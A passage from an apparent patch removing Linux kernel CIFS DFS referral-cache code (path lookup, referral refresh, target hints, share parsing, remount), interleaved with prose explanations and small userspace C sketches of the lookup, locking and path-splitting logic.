+-		if (cifs_toupper(c1) != cifs_toupper(c2))
+-			return false;
+-	}
+-	return true;
+-}
+-
+-static struct cache_entry *__lookup_cache_entry(const char *path, unsigned int hash, int len)
+-{
+-	struct cache_entry *ce;
+-
+-	hlist_for_each_entry(ce, &cache_htable[hash], hlist) {
+-		if (dfs_path_equal(ce->path, strlen(ce->path), path, len)) {
+-			dump_ce(ce);
+-			return ce;
+-		}
+-	}
+-	return ERR_PTR(-ENOENT);
+-}
+-
+-/*
+- * Find a DFS cache entry in hash table and optionally check prefix path against normalized @path.
+- *
+- * Use whole path components in the match.  Must be called with htable_rw_lock held.
+- *
+- * Return ERR_PTR(-ENOENT) if the entry is not found.
+- */
+-static struct cache_entry *lookup_cache_entry(const char *path)
+-{
+-	struct cache_entry *ce;
+-	int cnt = 0;
+-	const char *s = path, *e;
+-	char sep = *s;
+-	unsigned int hash;
+-	int rc;
+-
+-	while ((s = strchr(s, sep)) && ++cnt < 3)
+-		s++;
+-
+-	if (cnt < 3) {
+-		rc = cache_entry_hash(path, strlen(path), &hash);
+-		if (rc)
+-			return ERR_PTR(rc);
+-		return __lookup_cache_entry(path, hash, strlen(path));
+-	}
+-	/*
+-	 * Handle paths that have more than two path components and are a complete prefix of the DFS
+-	 * referral request path (@path).
+-	 *
+-	 * See MS-DFSC 3.2.5.5 "Receiving a Root Referral Request or Link Referral Request".
+-	 */
+-	e = path + strlen(path) - 1;
+-	while (e > s) {
+-		int len;
+-
+-		/* skip separators */
+-		while (e > s && *e == sep)
+-			e--;
+-		if (e == s)
+-			break;
+-
+-		len = e + 1 - path;
+-		rc = cache_entry_hash(path, len, &hash);
+-		if (rc)
+-			return ERR_PTR(rc);
+-		ce = __lookup_cache_entry(path, hash, len);
+-		if (!IS_ERR(ce))
+-			return ce;
+-
+-		/* backward until separator */
+-		while (e > s && *e != sep)
+-			e--;
+-	}
+-	return ERR_PTR(-ENOENT);
+-}
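
The pointer arithmetic above implements a longest-prefix match: paths with fewer than three components are probed whole, longer ones are probed from the full path down, dropping one trailing component per iteration. A standalone sketch of the same walk, assuming ASCII paths and a single cached prefix in place of the hash table:

#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Stand-in for the hash-table probe; matches one known cached prefix. */
static bool probe(const char *path, size_t len)
{
	static const char cached[] = "\\dom\\dfsroot";

	return len == strlen(cached) && !strncasecmp(path, cached, len);
}

/* Probe the longest prefix first, dropping one trailing component at a time. */
static int lookup_longest_prefix(const char *path)
{
	size_t len = strlen(path);

	while (len > 1) {
		while (len > 1 && path[len - 1] == '\\')	/* skip separators */
			len--;
		if (probe(path, len))
			return (int)len;	/* length of the matched prefix */
		while (len > 1 && path[len - 1] != '\\')	/* drop last component */
			len--;
	}
	return -1;
}

int main(void)
{
	printf("matched prefix length: %d\n",
	       lookup_longest_prefix("\\dom\\dfsroot\\dir1\\dir2"));	/* 12 */
	return 0;
}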
+-
+-/**
+- * dfs_cache_destroy - destroy DFS referral cache
+- */
+-void dfs_cache_destroy(void)
+-{
+-	cancel_delayed_work_sync(&refresh_task);
+-	unload_nls(cache_cp);
+-	free_mount_group_list();
+-	flush_cache_ents();
+-	kmem_cache_destroy(cache_slab);
+-	destroy_workqueue(dfscache_wq);
+-
+-	cifs_dbg(FYI, "%s: destroyed DFS referral cache\n", __func__);
+-}
+-
+-/* Update a cache entry with the new referral in @refs */
+-static int update_cache_entry_locked(struct cache_entry *ce, const struct dfs_info3_param *refs,
+-				     int numrefs)
+-{
+-	int rc;
+-	char *s, *th = NULL;
+-
+-	WARN_ON(!rwsem_is_locked(&htable_rw_lock));
+-
+-	if (ce->tgthint) {
+-		s = ce->tgthint->name;
+-		th = kstrdup(s, GFP_ATOMIC);
+-		if (!th)
+-			return -ENOMEM;
+-	}
+-
+-	free_tgts(ce);
+-	ce->numtgts = 0;
+-
+-	rc = copy_ref_data(refs, numrefs, ce, th);
+-
+-	kfree(th);
+-
+-	return rc;
+-}
+-
+-static int get_dfs_referral(const unsigned int xid, struct cifs_ses *ses, const char *path,
+-			    struct dfs_info3_param **refs, int *numrefs)
+-{
+-	int rc;
+-	int i;
+-
+-	cifs_dbg(FYI, "%s: get an DFS referral for %s\n", __func__, path);
+-
+-	*refs = NULL;
+-	*numrefs = 0;
+-
+-	if (!ses || !ses->server || !ses->server->ops->get_dfs_refer)
+-		return -EOPNOTSUPP;
+-	if (unlikely(!cache_cp))
+-		return -EINVAL;
+-
+-	rc =  ses->server->ops->get_dfs_refer(xid, ses, path, refs, numrefs, cache_cp,
+-					      NO_MAP_UNI_RSVD);
+-	if (!rc) {
+-		struct dfs_info3_param *ref = *refs;
+-
+-		for (i = 0; i < *numrefs; i++)
+-			convert_delimiter(ref[i].path_name, '\\');
+-	}
+-	return rc;
+-}
+-
+-/*
+- * Find, create or update a DFS cache entry.
+- *
+- * If the entry wasn't found, it will create a new one.  If it was found
+- * but expired, it will update the entry accordingly.
+- *
+- * For interlinks, cifs_mount() and expand_dfs_referral() are supposed to
+- * handle them properly.
+- */
+-static int cache_refresh_path(const unsigned int xid, struct cifs_ses *ses, const char *path)
+-{
+-	struct dfs_info3_param *refs = NULL;
+-	struct cache_entry *ce;
+-	int numrefs = 0;
+-	int rc;
+-
+-	cifs_dbg(FYI, "%s: search path: %s\n", __func__, path);
+-
+-	down_read(&htable_rw_lock);
+-
+-	ce = lookup_cache_entry(path);
+-	if (!IS_ERR(ce) && !cache_entry_expired(ce)) {
+-		up_read(&htable_rw_lock);
+-		return 0;
+-	}
+-	/*
+-	 * Unlock shared access as we don't want to hold any locks while getting
+-	 * a new referral.  The @ses used for performing the I/O could be
+-	 * reconnecting, and it acquires @htable_rw_lock to look up the dfs
+-	 * cache in order to fail over, if necessary.
+-	 */
+-	up_read(&htable_rw_lock);
+-
+-	/*
+-	 * Either the entry was not found, or it is expired.
+-	 * Request a new DFS referral in order to create or update a cache entry.
+-	 */
+-	rc = get_dfs_referral(xid, ses, path, &refs, &numrefs);
+-	if (rc)
+-		goto out;
+-
+-	dump_refs(refs, numrefs);
+-
+-	down_write(&htable_rw_lock);
+-	/* Re-check as another task might have it added or refreshed already */
+-	ce = lookup_cache_entry(path);
+-	if (!IS_ERR(ce)) {
+-		if (cache_entry_expired(ce))
+-			rc = update_cache_entry_locked(ce, refs, numrefs);
+-	} else {
+-		rc = add_cache_entry_locked(refs, numrefs);
+-	}
+-
+-	up_write(&htable_rw_lock);
+-out:
+-	free_dfs_info_array(refs, numrefs);
+-	return rc;
+-}
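
The locking shape here is a classic double-checked update: probe under the read lock, drop every lock for the network round trip, then re-check under the write lock before inserting or updating, since another task may have refreshed the entry meanwhile. A compact pthread sketch of the same shape, with stubbed-out cache and network calls (all names below are illustrative):

#include <pthread.h>
#include <stdbool.h>
#include <stdio.h>

static pthread_rwlock_t htable_lock = PTHREAD_RWLOCK_INITIALIZER;

/* Stubs standing in for the cache lookup, network call, and cache update. */
static bool cache_has_fresh(const char *path) { (void)path; return false; }
static int fetch_referral(const char *path) { printf("referral: %s\n", path); return 0; }
static void insert_or_update(const char *path) { (void)path; }

static int refresh_path(const char *path)
{
	int rc;

	pthread_rwlock_rdlock(&htable_lock);
	if (cache_has_fresh(path)) {		/* fast path: entry still valid */
		pthread_rwlock_unlock(&htable_lock);
		return 0;
	}
	pthread_rwlock_unlock(&htable_lock);	/* never hold locks across I/O */

	rc = fetch_referral(path);		/* network round trip */
	if (rc)
		return rc;

	pthread_rwlock_wrlock(&htable_lock);
	insert_or_update(path);			/* must re-check under the lock */
	pthread_rwlock_unlock(&htable_lock);
	return 0;
}

int main(void)
{
	return refresh_path("\\dom\\dfsroot");
}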
+-
+-/*
+- * Set up a DFS referral from a given cache entry.
+- *
+- * Must be called with htable_rw_lock held.
+- */
+-static int setup_referral(const char *path, struct cache_entry *ce,
+-			  struct dfs_info3_param *ref, const char *target)
+-{
+-	int rc;
+-
+-	cifs_dbg(FYI, "%s: set up new ref\n", __func__);
+-
+-	memset(ref, 0, sizeof(*ref));
+-
+-	ref->path_name = kstrdup(path, GFP_ATOMIC);
+-	if (!ref->path_name)
+-		return -ENOMEM;
+-
+-	ref->node_name = kstrdup(target, GFP_ATOMIC);
+-	if (!ref->node_name) {
+-		rc = -ENOMEM;
+-		goto err_free_path;
+-	}
+-
+-	ref->path_consumed = ce->path_consumed;
+-	ref->ttl = ce->ttl;
+-	ref->server_type = ce->srvtype;
+-	ref->ref_flag = ce->ref_flags;
+-	ref->flags = ce->hdr_flags;
+-
+-	return 0;
+-
+-err_free_path:
+-	kfree(ref->path_name);
+-	ref->path_name = NULL;
+-	return rc;
+-}
+-
+-/* Return target list of a DFS cache entry */
+-static int get_targets(struct cache_entry *ce, struct dfs_cache_tgt_list *tl)
+-{
+-	int rc;
+-	struct list_head *head = &tl->tl_list;
+-	struct cache_dfs_tgt *t;
+-	struct dfs_cache_tgt_iterator *it, *nit;
+-
+-	memset(tl, 0, sizeof(*tl));
+-	INIT_LIST_HEAD(head);
+-
+-	list_for_each_entry(t, &ce->tlist, list) {
+-		it = kzalloc(sizeof(*it), GFP_ATOMIC);
+-		if (!it) {
+-			rc = -ENOMEM;
+-			goto err_free_it;
+-		}
+-
+-		it->it_name = kstrdup(t->name, GFP_ATOMIC);
+-		if (!it->it_name) {
+-			kfree(it);
+-			rc = -ENOMEM;
+-			goto err_free_it;
+-		}
+-		it->it_path_consumed = t->path_consumed;
+-
+-		if (ce->tgthint == t)
+-			list_add(&it->it_list, head);
+-		else
+-			list_add_tail(&it->it_list, head);
+-	}
+-
+-	tl->tl_numtgts = ce->numtgts;
+-
+-	return 0;
+-
+-err_free_it:
+-	list_for_each_entry_safe(it, nit, head, it_list) {
+-		list_del(&it->it_list);
+-		kfree(it->it_name);
+-		kfree(it);
+-	}
+-	return rc;
+-}
+-
+-/**
+- * dfs_cache_find - find a DFS cache entry
+- *
+- * If it doesn't find the cache entry, then it will get a DFS referral
+- * for @path and create a new entry.
+- *
+- * In case the cache entry exists but expired, it will get a DFS referral
+- * for @path and then update the respective cache entry.
+- *
+- * These parameters are passed down to the get_dfs_refer() call if it
+- * needs to be issued:
+- * @xid: syscall xid
+- * @ses: smb session to issue the request on
+- * @cp: codepage
+- * @remap: path character remapping type
+- * @path: path to lookup in DFS referral cache.
+- *
+- * @ref: when non-NULL, store single DFS referral result in it.
+- * @tgt_list: when non-NULL, store complete DFS target list in it.
+- *
+- * Return zero if the target was found, otherwise non-zero.
+- */
+-int dfs_cache_find(const unsigned int xid, struct cifs_ses *ses, const struct nls_table *cp,
+-		   int remap, const char *path, struct dfs_info3_param *ref,
+-		   struct dfs_cache_tgt_list *tgt_list)
+-{
+-	int rc;
+-	const char *npath;
+-	struct cache_entry *ce;
+-
+-	npath = dfs_cache_canonical_path(path, cp, remap);
+-	if (IS_ERR(npath))
+-		return PTR_ERR(npath);
+-
+-	rc = cache_refresh_path(xid, ses, npath);
+-	if (rc)
+-		goto out_free_path;
+-
+-	down_read(&htable_rw_lock);
+-
+-	ce = lookup_cache_entry(npath);
+-	if (IS_ERR(ce)) {
+-		up_read(&htable_rw_lock);
+-		rc = PTR_ERR(ce);
+-		goto out_free_path;
+-	}
+-
+-	if (ref)
+-		rc = setup_referral(path, ce, ref, get_tgt_name(ce));
+-	else
+-		rc = 0;
+-	if (!rc && tgt_list)
+-		rc = get_targets(ce, tgt_list);
+-
+-	up_read(&htable_rw_lock);
+-
+-out_free_path:
+-	kfree(npath);
+-	return rc;
+-}
+-
+-/**
+- * dfs_cache_noreq_find - find a DFS cache entry without sending any requests to
+- * the currently connected server.
+- *
+- * NOTE: This function will neither update a cache entry if it has expired,
+- * nor create a new cache entry if @path hasn't been found.  It relies
+- * entirely on an existing cache entry.
+- *
+- * @path: canonical DFS path to lookup in the DFS referral cache.
+- * @ref: when non-NULL, store single DFS referral result in it.
+- * @tgt_list: when non-NULL, store complete DFS target list in it.
+- *
+- * Return 0 if successful.
+- * Return -ENOENT if the entry was not found.
+- * Return non-zero for other errors.
+- */
+-int dfs_cache_noreq_find(const char *path, struct dfs_info3_param *ref,
+-			 struct dfs_cache_tgt_list *tgt_list)
+-{
+-	int rc;
+-	struct cache_entry *ce;
+-
+-	cifs_dbg(FYI, "%s: path: %s\n", __func__, path);
+-
+-	down_read(&htable_rw_lock);
+-
+-	ce = lookup_cache_entry(path);
+-	if (IS_ERR(ce)) {
+-		rc = PTR_ERR(ce);
+-		goto out_unlock;
+-	}
+-
+-	if (ref)
+-		rc = setup_referral(path, ce, ref, get_tgt_name(ce));
+-	else
+-		rc = 0;
+-	if (!rc && tgt_list)
+-		rc = get_targets(ce, tgt_list);
+-
+-out_unlock:
+-	up_read(&htable_rw_lock);
+-	return rc;
+-}
+-
+-/**
+- * dfs_cache_update_tgthint - update target hint of a DFS cache entry
+- *
+- * If it doesn't find the cache entry, then it will get a DFS referral for @path
+- * and create a new entry.
+- *
+- * In case the cache entry exists but expired, it will get a DFS referral
+- * for @path and then update the respective cache entry.
+- *
+- * @xid: syscall id
+- * @ses: smb session
+- * @cp: codepage
+- * @remap: type of character remapping for paths
+- * @path: path to lookup in DFS referral cache
+- * @it: DFS target iterator
+- *
+- * Return zero if the target hint was updated successfully, otherwise non-zero.
+- */
+-int dfs_cache_update_tgthint(const unsigned int xid, struct cifs_ses *ses,
+-			     const struct nls_table *cp, int remap, const char *path,
+-			     const struct dfs_cache_tgt_iterator *it)
+-{
+-	struct cache_dfs_tgt *t;
+-	struct cache_entry *ce;
+-	const char *npath;
+-	int rc = 0;
+-
+-	npath = dfs_cache_canonical_path(path, cp, remap);
+-	if (IS_ERR(npath))
+-		return PTR_ERR(npath);
+-
+-	cifs_dbg(FYI, "%s: update target hint - path: %s\n", __func__, npath);
+-
+-	rc = cache_refresh_path(xid, ses, npath);
+-	if (rc)
+-		goto out_free_path;
+-
+-	down_write(&htable_rw_lock);
+-
+-	ce = lookup_cache_entry(npath);
+-	if (IS_ERR(ce)) {
+-		rc = PTR_ERR(ce);
+-		goto out_unlock;
+-	}
+-
+-	t = ce->tgthint;
+-
+-	if (likely(!strcasecmp(it->it_name, t->name)))
+-		goto out_unlock;
+-
+-	list_for_each_entry(t, &ce->tlist, list) {
+-		if (!strcasecmp(t->name, it->it_name)) {
+-			ce->tgthint = t;
+-			cifs_dbg(FYI, "%s: new target hint: %s\n", __func__,
+-				 it->it_name);
+-			break;
+-		}
+-	}
+-
+-out_unlock:
+-	up_write(&htable_rw_lock);
+-out_free_path:
+-	kfree(npath);
+-	return rc;
+-}
+-
+-/**
+- * dfs_cache_noreq_update_tgthint - update target hint of a DFS cache entry
+- * without sending any requests to the currently connected server.
+- *
+- * NOTE: This function will neither update a cache entry if it has expired,
+- * nor create a new cache entry if @path hasn't been found.  It relies
+- * entirely on an existing cache entry.
+- *
+- * @path: canonical DFS path to lookup in DFS referral cache.
+- * @it: target iterator which contains the target hint to update the cache
+- * entry with.
+- *
+- * Return zero if the target hint was updated successfully, otherwise non-zero.
+- */
+-int dfs_cache_noreq_update_tgthint(const char *path, const struct dfs_cache_tgt_iterator *it)
+-{
+-	int rc;
+-	struct cache_entry *ce;
+-	struct cache_dfs_tgt *t;
+-
+-	if (!it)
+-		return -EINVAL;
+-
+-	cifs_dbg(FYI, "%s: path: %s\n", __func__, path);
+-
+-	down_write(&htable_rw_lock);
+-
+-	ce = lookup_cache_entry(path);
+-	if (IS_ERR(ce)) {
+-		rc = PTR_ERR(ce);
+-		goto out_unlock;
+-	}
+-
+-	rc = 0;
+-	t = ce->tgthint;
+-
+-	if (unlikely(!strcasecmp(it->it_name, t->name)))
+-		goto out_unlock;
+-
+-	list_for_each_entry(t, &ce->tlist, list) {
+-		if (!strcasecmp(t->name, it->it_name)) {
+-			ce->tgthint = t;
+-			cifs_dbg(FYI, "%s: new target hint: %s\n", __func__,
+-				 it->it_name);
+-			break;
+-		}
+-	}
+-
+-out_unlock:
+-	up_write(&htable_rw_lock);
+-	return rc;
+-}
+-
+-/**
+- * dfs_cache_get_tgt_referral - returns a DFS referral (@ref) from a given
+- * target iterator (@it).
+- *
+- * @path: canonical DFS path to lookup in DFS referral cache.
+- * @it: DFS target iterator.
+- * @ref: DFS referral pointer to set up the gathered information.
+- *
+- * Return zero if the DFS referral was set up correctly, otherwise non-zero.
+- */
+-int dfs_cache_get_tgt_referral(const char *path, const struct dfs_cache_tgt_iterator *it,
+-			       struct dfs_info3_param *ref)
+-{
+-	int rc;
+-	struct cache_entry *ce;
+-
+-	if (!it || !ref)
+-		return -EINVAL;
+-
+-	cifs_dbg(FYI, "%s: path: %s\n", __func__, path);
+-
+-	down_read(&htable_rw_lock);
+-
+-	ce = lookup_cache_entry(path);
+-	if (IS_ERR(ce)) {
+-		rc = PTR_ERR(ce);
+-		goto out_unlock;
+-	}
+-
+-	cifs_dbg(FYI, "%s: target name: %s\n", __func__, it->it_name);
+-
+-	rc = setup_referral(path, ce, ref, it->it_name);
+-
+-out_unlock:
+-	up_read(&htable_rw_lock);
+-	return rc;
+-}
+-
+-/**
+- * dfs_cache_add_refsrv_session - add SMB session of referral server
+- *
+- * @mount_id: mount group uuid to lookup.
+- * @ses: reference counted SMB session of referral server.
+- */
+-void dfs_cache_add_refsrv_session(const uuid_t *mount_id, struct cifs_ses *ses)
+-{
+-	struct mount_group *mg;
+-
+-	if (WARN_ON_ONCE(!mount_id || uuid_is_null(mount_id) || !ses))
+-		return;
+-
+-	mg = get_mount_group(mount_id);
+-	if (WARN_ON_ONCE(IS_ERR(mg)))
+-		return;
+-
+-	spin_lock(&mg->lock);
+-	if (mg->num_sessions < ARRAY_SIZE(mg->sessions))
+-		mg->sessions[mg->num_sessions++] = ses;
+-	spin_unlock(&mg->lock);
+-	kref_put(&mg->refcount, mount_group_release);
+-}
+-
+-/**
+- * dfs_cache_put_refsrv_sessions - put all referral server sessions
+- *
+- * Put all SMB sessions from the given mount group id.
+- *
+- * @mount_id: mount group uuid to lookup.
+- */
+-void dfs_cache_put_refsrv_sessions(const uuid_t *mount_id)
+-{
+-	struct mount_group *mg;
+-
+-	if (!mount_id || uuid_is_null(mount_id))
+-		return;
+-
+-	mutex_lock(&mount_group_list_lock);
+-	mg = find_mount_group_locked(mount_id);
+-	if (IS_ERR(mg)) {
+-		mutex_unlock(&mount_group_list_lock);
+-		return;
+-	}
+-	mutex_unlock(&mount_group_list_lock);
+-	kref_put(&mg->refcount, mount_group_release);
+-}
+-
+-/* Extract share from DFS target and return a pointer to prefix path or NULL */
+-static const char *parse_target_share(const char *target, char **share)
+-{
+-	const char *s, *seps = "/\\";
+-	size_t len;
+-
+-	s = strpbrk(target + 1, seps);
+-	if (!s)
+-		return ERR_PTR(-EINVAL);
+-
+-	len = strcspn(s + 1, seps);
+-	if (!len)
+-		return ERR_PTR(-EINVAL);
+-	s += len;
+-
+-	len = s - target + 1;
+-	*share = kstrndup(target, len, GFP_KERNEL);
+-	if (!*share)
+-		return ERR_PTR(-ENOMEM);
+-
+-	s = target + len;
+-	return s + strspn(s, seps);
+-}
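
Concretely, for a target like \srv\share\a\b this yields *share = \srv\share and a returned pointer at a\b. A standalone re-implementation of the split for illustration, assuming ASCII targets and using strndup() in place of kstrndup():

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Userspace version of the share/prefix split. */
static const char *split_target(const char *target, char **share)
{
	const char *seps = "/\\";
	const char *s = strpbrk(target + 1, seps);	/* end of server name */
	size_t len;

	if (!s)
		return NULL;
	len = strcspn(s + 1, seps);			/* share name length */
	if (!len)
		return NULL;
	s += len;					/* last char of share */

	len = s - target + 1;
	*share = strndup(target, len);
	s = target + len;
	return s + strspn(s, seps);			/* prefix path or "" */
}

int main(void)
{
	char *share = NULL;
	const char *prefix = split_target("\\srv\\share\\a\\b", &share);

	printf("share=%s prefix=%s\n", share, prefix); /* \srv\share  a\b */
	free(share);
	return 0;
}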
+-
+-/**
+- * dfs_cache_get_tgt_share - parse a DFS target
+- *
+- * @path: DFS full path
+- * @it: DFS target iterator.
+- * @share: tree name.
+- * @prefix: prefix path.
+- *
+- * Return zero if target was parsed correctly, otherwise non-zero.
+- */
+-int dfs_cache_get_tgt_share(char *path, const struct dfs_cache_tgt_iterator *it, char **share,
+-			    char **prefix)
+-{
+-	char sep;
+-	char *target_share;
+-	char *ppath = NULL;
+-	const char *target_ppath, *dfsref_ppath;
+-	size_t target_pplen, dfsref_pplen;
+-	size_t len, c;
+-
+-	if (!it || !path || !share || !prefix || strlen(path) < it->it_path_consumed)
+-		return -EINVAL;
+-
+-	sep = it->it_name[0];
+-	if (sep != '\\' && sep != '/')
+-		return -EINVAL;
+-
+-	target_ppath = parse_target_share(it->it_name, &target_share);
+-	if (IS_ERR(target_ppath))
+-		return PTR_ERR(target_ppath);
+-
+-	/* point to prefix in DFS referral path */
+-	dfsref_ppath = path + it->it_path_consumed;
+-	dfsref_ppath += strspn(dfsref_ppath, "/\\");
+-
+-	target_pplen = strlen(target_ppath);
+-	dfsref_pplen = strlen(dfsref_ppath);
+-
+-	/* merge prefix paths from DFS referral path and target node */
+-	if (target_pplen || dfsref_pplen) {
+-		len = target_pplen + dfsref_pplen + 2;
+-		ppath = kzalloc(len, GFP_KERNEL);
+-		if (!ppath) {
+-			kfree(target_share);
+-			return -ENOMEM;
+-		}
+-		c = strscpy(ppath, target_ppath, len);
+-		if (c && dfsref_pplen)
+-			ppath[c] = sep;
+-		strlcat(ppath, dfsref_ppath, len);
+-	}
+-	*share = target_share;
+-	*prefix = ppath;
+-	return 0;
+-}
+-
+-static bool target_share_equal(struct TCP_Server_Info *server, const char *s1, const char *s2)
+-{
+-	char unc[sizeof("\\\\") + SERVER_NAME_LENGTH] = {0};
+-	const char *host;
+-	size_t hostlen;
+-	char *ip = NULL;
+-	struct sockaddr sa;
+-	bool match;
+-	int rc;
+-
+-	if (strcasecmp(s1, s2))
+-		return false;
+-
+-	/*
+-	 * Resolve the share's hostname and check if the server address matches.
+-	 * Otherwise just ignore it, as we may lack the upcall to resolve the
+-	 * hostname or may have failed to convert the IP address.
+-	 */
+-	match = true;
+-	extract_unc_hostname(s1, &host, &hostlen);
+-	scnprintf(unc, sizeof(unc), "\\\\%.*s", (int)hostlen, host);
+-
+-	rc = dns_resolve_server_name_to_ip(unc, &ip, NULL);
+-	if (rc < 0) {
+-		cifs_dbg(FYI, "%s: could not resolve %.*s. assuming server address matches.\n",
+-			 __func__, (int)hostlen, host);
+-		return true;
+-	}
+-
+-	if (!cifs_convert_address(&sa, ip, strlen(ip))) {
+-		cifs_dbg(VFS, "%s: failed to convert address \'%s\'. skip address matching.\n",
+-			 __func__, ip);
+-	} else {
+-		cifs_server_lock(server);
+-		match = cifs_match_ipaddr((struct sockaddr *)&server->dstaddr, &sa);
+-		cifs_server_unlock(server);
+-	}
+-
+-	kfree(ip);
+-	return match;
+-}
+-
+-/*
+- * Mark dfs tcon for reconnecting when the currently connected tcon does not match any of the new
+- * target shares in @refs.
+- */
+-static void mark_for_reconnect_if_needed(struct cifs_tcon *tcon, struct dfs_cache_tgt_list *tl,
+-					 const struct dfs_info3_param *refs, int numrefs)
+-{
+-	struct dfs_cache_tgt_iterator *it;
+-	int i;
+-
+-	for (it = dfs_cache_get_tgt_iterator(tl); it; it = dfs_cache_get_next_tgt(tl, it)) {
+-		for (i = 0; i < numrefs; i++) {
+-			if (target_share_equal(tcon->ses->server, dfs_cache_get_tgt_name(it),
+-					       refs[i].node_name))
+-				return;
+-		}
+-	}
+-
+-	cifs_dbg(FYI, "%s: no cached or matched targets. mark dfs share for reconnect.\n", __func__);
+-	cifs_signal_cifsd_for_reconnect(tcon->ses->server, true);
+-}
+-
+-/* Refresh dfs referral of tcon and mark it for reconnect if needed */
+-static int __refresh_tcon(const char *path, struct cifs_ses **sessions, struct cifs_tcon *tcon,
+-			  bool force_refresh)
+-{
+-	struct cifs_ses *ses;
+-	struct cache_entry *ce;
+-	struct dfs_info3_param *refs = NULL;
+-	int numrefs = 0;
+-	bool needs_refresh = false;
+-	struct dfs_cache_tgt_list tl = DFS_CACHE_TGT_LIST_INIT(tl);
+-	int rc = 0;
+-	unsigned int xid;
+-
+-	ses = find_ipc_from_server_path(sessions, path);
+-	if (IS_ERR(ses)) {
+-		cifs_dbg(FYI, "%s: could not find ipc session\n", __func__);
+-		return PTR_ERR(ses);
+-	}
+-
+-	down_read(&htable_rw_lock);
+-	ce = lookup_cache_entry(path);
+-	needs_refresh = force_refresh || IS_ERR(ce) || cache_entry_expired(ce);
+-	if (!IS_ERR(ce)) {
+-		rc = get_targets(ce, &tl);
+-		if (rc)
+-			cifs_dbg(FYI, "%s: could not get dfs targets: %d\n", __func__, rc);
+-	}
+-	up_read(&htable_rw_lock);
+-
+-	if (!needs_refresh) {
+-		rc = 0;
+-		goto out;
+-	}
+-
+-	xid = get_xid();
+-	rc = get_dfs_referral(xid, ses, path, &refs, &numrefs);
+-	free_xid(xid);
+-
+-	/* Create or update a cache entry with the new referral */
+-	if (!rc) {
+-		dump_refs(refs, numrefs);
+-
+-		down_write(&htable_rw_lock);
+-		ce = lookup_cache_entry(path);
+-		if (IS_ERR(ce))
+-			add_cache_entry_locked(refs, numrefs);
+-		else if (force_refresh || cache_entry_expired(ce))
+-			update_cache_entry_locked(ce, refs, numrefs);
+-		up_write(&htable_rw_lock);
+-
+-		mark_for_reconnect_if_needed(tcon, &tl, refs, numrefs);
+-	}
+-
+-out:
+-	dfs_cache_free_tgts(&tl);
+-	free_dfs_info_array(refs, numrefs);
+-	return rc;
+-}
+-
+-static int refresh_tcon(struct cifs_ses **sessions, struct cifs_tcon *tcon, bool force_refresh)
+-{
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-
+-	mutex_lock(&server->refpath_lock);
+-	if (server->origin_fullpath) {
+-		if (server->leaf_fullpath && strcasecmp(server->leaf_fullpath,
+-							server->origin_fullpath))
+-			__refresh_tcon(server->leaf_fullpath + 1, sessions, tcon, force_refresh);
+-		__refresh_tcon(server->origin_fullpath + 1, sessions, tcon, force_refresh);
+-	}
+-	mutex_unlock(&server->refpath_lock);
+-
+-	return 0;
+-}
+-
+-/**
+- * dfs_cache_remount_fs - remount a DFS share
+- *
+- * Reconfigure dfs mount by forcing a new DFS referral and if the currently cached targets do not
+- * match any of the new targets, mark it for reconnect.
+- *
+- * @cifs_sb: cifs superblock.
+- *
+- * Return zero if remounted, otherwise non-zero.
+- */
+-int dfs_cache_remount_fs(struct cifs_sb_info *cifs_sb)
+-{
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	struct mount_group *mg;
+-	struct cifs_ses *sessions[CACHE_MAX_ENTRIES + 1] = {NULL};
+-	int rc;
+-
+-	if (!cifs_sb || !cifs_sb->master_tlink)
+-		return -EINVAL;
+-
+-	tcon = cifs_sb_master_tcon(cifs_sb);
+-	server = tcon->ses->server;
+-
+-	if (!server->origin_fullpath) {
+-		cifs_dbg(FYI, "%s: not a dfs mount\n", __func__);
+-		return 0;
+-	}
+-
+-	if (uuid_is_null(&cifs_sb->dfs_mount_id)) {
+-		cifs_dbg(FYI, "%s: no dfs mount group id\n", __func__);
+-		return -EINVAL;
+-	}
+-
+-	mutex_lock(&mount_group_list_lock);
+-	mg = find_mount_group_locked(&cifs_sb->dfs_mount_id);
+-	if (IS_ERR(mg)) {
+-		mutex_unlock(&mount_group_list_lock);
+-		cifs_dbg(FYI, "%s: no ipc session for refreshing referral\n", __func__);
+-		return PTR_ERR(mg);
+-	}
+-	kref_get(&mg->refcount);
+-	mutex_unlock(&mount_group_list_lock);
+-
+-	spin_lock(&mg->lock);
+-	memcpy(&sessions, mg->sessions, mg->num_sessions * sizeof(mg->sessions[0]));
+-	spin_unlock(&mg->lock);
+-
+-	/*
+-	 * After reconnecting to a different server, unique ids won't match anymore, so we disable
+-	 * serverino. This prevents dentry revalidation from treating the dentries as stale (ESTALE).
+-	 */
+-	cifs_autodisable_serverino(cifs_sb);
+-	/*
+-	 * Force the use of prefix path to support failover on DFS paths that resolve to targets
+-	 * that have different prefix paths.
+-	 */
+-	cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_USE_PREFIX_PATH;
+-	rc = refresh_tcon(sessions, tcon, true);
+-
+-	kref_put(&mg->refcount, mount_group_release);
+-	return rc;
+-}
+-
+-/*
+- * Refresh all active dfs mounts regardless of whether they are in cache or not.
+- * (cache can be cleared)
+- */
+-static void refresh_mounts(struct cifs_ses **sessions)
+-{
+-	struct TCP_Server_Info *server;
+-	struct cifs_ses *ses;
+-	struct cifs_tcon *tcon, *ntcon;
+-	struct list_head tcons;
+-
+-	INIT_LIST_HEAD(&tcons);
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
+-		spin_lock(&server->srv_lock);
+-		if (!server->is_dfs_conn) {
+-			spin_unlock(&server->srv_lock);
+-			continue;
+-		}
+-		spin_unlock(&server->srv_lock);
+-
+-		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
+-			list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-				spin_lock(&tcon->tc_lock);
+-				if (!tcon->ipc && !tcon->need_reconnect) {
+-					tcon->tc_count++;
+-					list_add_tail(&tcon->ulist, &tcons);
+-				}
+-				spin_unlock(&tcon->tc_lock);
+-			}
+-		}
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	list_for_each_entry_safe(tcon, ntcon, &tcons, ulist) {
+-		struct TCP_Server_Info *server = tcon->ses->server;
+-
+-		list_del_init(&tcon->ulist);
+-
+-		mutex_lock(&server->refpath_lock);
+-		if (server->origin_fullpath) {
+-			if (server->leaf_fullpath && strcasecmp(server->leaf_fullpath,
